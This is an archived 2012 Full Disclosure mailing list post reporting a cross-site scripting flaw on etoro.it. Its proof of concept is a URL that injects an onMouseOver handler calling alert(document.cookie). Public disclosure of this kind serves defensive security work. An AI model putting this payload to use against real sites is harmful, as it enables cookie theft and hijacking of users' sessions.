Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

etoro.it vulnerable to XSS
From: tig3rhack () tormail org
Date: Sat, 29 Sep 2012 10:34:18 -0000

The famous online trading website is vulnerable to an XSS attack

Poc:

http://www.etoro.it/educazione/node/1008/10%22%20onMouseOver=%22alert%28document.cookie%29%22

Info: https://tig3rblog.wordpress.com/2012/09/29/etoro-it-vulnerable-to-xss/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


  By Date           By Thread  

Current thread:
  • etoro.it vulnerable to XSS tig3rhack (Sep 29)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]